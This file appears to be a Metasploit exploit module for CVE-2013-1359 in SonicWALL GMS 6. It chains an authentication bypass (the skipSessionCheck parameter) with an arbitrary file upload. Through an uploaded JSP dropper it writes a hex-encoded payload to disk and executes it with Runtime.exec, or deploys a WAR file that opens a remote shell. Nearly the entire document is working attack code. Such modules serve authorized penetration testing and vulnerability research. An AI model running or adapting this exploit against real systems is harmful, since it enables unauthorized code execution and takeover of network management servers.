##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] }

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'SonicWALL GMS 6 Arbitrary File Upload',
        'Description' => %q{
          This module exploits a code execution flaw in SonicWALL GMS. It exploits two
          vulnerabilities in order to get its objective. An authentication bypass in the
          Web Administration interface allows to abuse the "appliance" application and upload
          an arbitrary payload embedded in a JSP. The module has been tested successfully on
          SonicWALL GMS 6.0.6017 over Windows 2003 SP2 and SonicWALL GMS 6.0.6022 Virtual
          Appliance (Linux). On the Virtual Appliance the linux meterpreter hasn't run
          successfully while testing, shell payload has been used.
        },
        'Author' => [
          'Nikolas Sotiriu', # Vulnerability Discovery
          'Redsadic <julian.vilas[at]gmail.com>', # Metasploit module
          'juan vazquez' # Metasploit module
        ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'CVE', '2013-1359'],
          [ 'OSVDB', '89347' ],
          [ 'BID', '57445' ],
          [ 'EDB', '24204' ]
        ],
        'Privileged' => true,
        'Platform' => %w{linux win},
        'Targets' => [
          [
            'SonicWALL GMS 6.0 Viewpoint / Java Universal',
            {
              'Arch' => ARCH_JAVA,
              'Platform' => 'java'
            }
          ],
          [
            'SonicWALL GMS 6.0 Viewpoint / Windows 2003 SP2',
            {
              'Arch' => ARCH_X86,
              'Platform' => 'win'
            }
          ],
          [
            'SonicWALL GMS 6.0 Viewpoint Virtual Appliance (Linux)',
            {
              'Arch' => ARCH_X86,
              'Platform' => 'linux'
            }
          ]
        ],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2012-01-17',
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        Opt::RPORT(80),
        OptString.new('TARGETURI', [true, 'Path to SonicWall GMS', '/'])
      ]
    )
  end

  def install_path
    return @install_path if @install_path

    res = send_request_cgi(
      {
        'uri' => normalize_uri(target_uri.path, "appliance", "applianceMainPage") + "?skipSessionCheck=1",
        'method' => 'POST',
        'connection' => 'TE, close',
        'headers' =>
          {
            'TE' => "deflate,gzip;q=0.3",
          },
        'vars_post' => {
          'num' => '123456',
          'action' => 'show_diagnostics',
          'task' => 'search',
          'item' => 'application_log',
          'criteria' => '*.*',
          'width' => '500'
        }
      }
    )

    @install_path = nil
    if res and res.code == 200 and res.body =~ /VALUE="(.*)logs/
      @install_path = $1
    end

    @install_path
  end

  def upload_file(location, filename, contents)
    post_data = Rex::MIME::Message.new
    post_data.add_part("file_system", nil, nil, "form-data; name=\"action\"")
    post_data.add_part("uploadFile", nil, nil, "form-data; name=\"task\"")
    post_data.add_part(location, nil, nil, "form-data; name=\"searchFolder\"")
    post_data.add_part(contents, "application/octet-stream", nil, "form-data; name=\"uploadFilename\"; filename=\"#{filename}\"")

    data = post_data.to_s

    res = send_request_cgi(
      {
        'uri' => normalize_uri(target_uri.path, "appliance", "applianceMainPage") + "?skipSessionCheck=1",
        'method' => 'POST',
        'data' => data,
        'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
        'headers' =>
          {
            'TE' => "deflate,gzip;q=0.3",
          },
        'connection' => 'TE, close'
      }
    )
    register_files_for_cleanup(path_join(location, filename))

    if res and res.code == 200 and res.body.empty?
      return true
    else
      return false
    end
  end

  def upload_and_run_jsp(filename, contents)
    upload_file(path_join(install_path, "webapps", "appliance"), filename, contents)
    send_request_cgi(
      {
        'uri' => normalize_uri(target_uri.path, "appliance", filename),
        'method' => 'GET'
      }
    )
  end

  def check
    if install_path.nil?
      return Exploit::CheckCode::Safe
    end

    if install_path.include?("\\")
      vprint_status("Target looks like Windows")
    else
      vprint_status("Target looks like Linux")
    end
    return Exploit::CheckCode::Vulnerable
  end

  def exploit
    # Get Tomcat installation path
    print_status("Retrieving Tomcat installation path...")

    if install_path.nil?
      fail_with(Failure::NotVulnerable, "#{peer} - Unable to retrieve the Tomcat installation path")
    end

    print_good("Tomcat installed on #{install_path}")

    if target['Platform'] == "java"
      exploit_java
    else
      exploit_native
    end
  end

  def exploit_java
    print_status("Uploading WAR file")
    app_base = rand_text_alphanumeric(4 + rand(32 - 4))

    war = payload.encoded_war({ :app_name => app_base }).to_s
    war_filename = path_join(install_path, "webapps", "#{app_base}.war")

    register_files_for_cleanup(war_filename)

    dropper = jsp_drop_bin(war, war_filename)
    dropper_filename = Rex::Text.rand_text_alpha(8) + ".jsp"

    upload_and_run_jsp(dropper_filename, dropper)

    10.times do
      select(nil, nil, nil, 2)

      # Now make a request to trigger the newly deployed war
      print_status("Attempting to launch payload in deployed WAR...")
      res = send_request_cgi(
        {
          'uri' => normalize_uri(target_uri.path, app_base, Rex::Text.rand_text_alpha(rand(8) + 8)),
          'method' => 'GET'
        }
      )
      # Failure. The request timed out or the server went away.
      break if res.nil?
      # Success! Triggered the payload, should have a shell incoming
      break if res.code == 200
    end
  end

  def exploit_native
    print_status("Uploading executable file")
    exe = payload.encoded_exe
    exe_filename = path_join(install_path, Rex::Text.rand_text_alpha(8))
    if target['Platform'] == "win"
      exe << ".exe"
    end

    register_files_for_cleanup(exe_filename)

    dropper = jsp_drop_and_execute(exe, exe_filename)
    dropper_filename = Rex::Text.rand_text_alpha(8) + ".jsp"

    upload_and_run_jsp(dropper_filename, dropper)
  end

  def path_join(*paths)
    if install_path.include?("\\")
      path = paths.join("\\")
      path.gsub!(%r|\\+|, "\\\\\\\\")
    else
      path = paths.join("/")
      path.gsub!(%r|//+|, "/")
    end

    path
  end

  # This should probably go in a mixin
  def jsp_drop_bin(bin_data, output_file)
    jspraw = %Q|<%@ page import="java.io.*" %>\n|
    jspraw << %Q|<%\n|
    jspraw << %Q|String data = "#{Rex::Text.to_hex(bin_data, "")}";\n|

    jspraw << %Q|FileOutputStream outputstream = new FileOutputStream("#{output_file}");\n|

    jspraw << %Q|int numbytes = data.length();\n|

    jspraw << %Q|byte[] bytes = new byte[numbytes/2];\n|
    jspraw << %Q|for (int counter = 0; counter < numbytes; counter += 2)\n|
    jspraw << %Q|{\n|
    jspraw << %Q|  char char1 = (char) data.charAt(counter);\n|
    jspraw << %Q|  char char2 = (char) data.charAt(counter + 1);\n|
    jspraw << %Q|  int comb = Character.digit(char1, 16) & 0xff;\n|
    jspraw << %Q|  comb <<= 4;\n|
    jspraw << %Q|  comb += Character.digit(char2, 16) & 0xff;\n|
    jspraw << %Q|  bytes[counter/2] = (byte)comb;\n|
    jspraw << %Q|}\n|

    jspraw << %Q|outputstream.write(bytes);\n|
    jspraw << %Q|outputstream.close();\n|
    jspraw << %Q|%>\n|

    jspraw
  end

  def jsp_execute_command(command)
    jspraw = %Q|<%@ page import="java.io.*" %>\n|
    jspraw << %Q|<%\n|
    jspraw << %Q|try {\n|
    jspraw << %Q|  Runtime.getRuntime().exec("chmod +x #{command}");\n|
    jspraw << %Q|} catch (IOException ioe) { }\n|
    jspraw << %Q|Runtime.getRuntime().exec("#{command}");\n|
    jspraw << %Q|%>\n|

    jspraw
  end

  def jsp_drop_and_execute(bin_data, output_file)
    jsp_drop_bin(bin_data, output_file) + jsp_execute_command(output_file)
  end
end
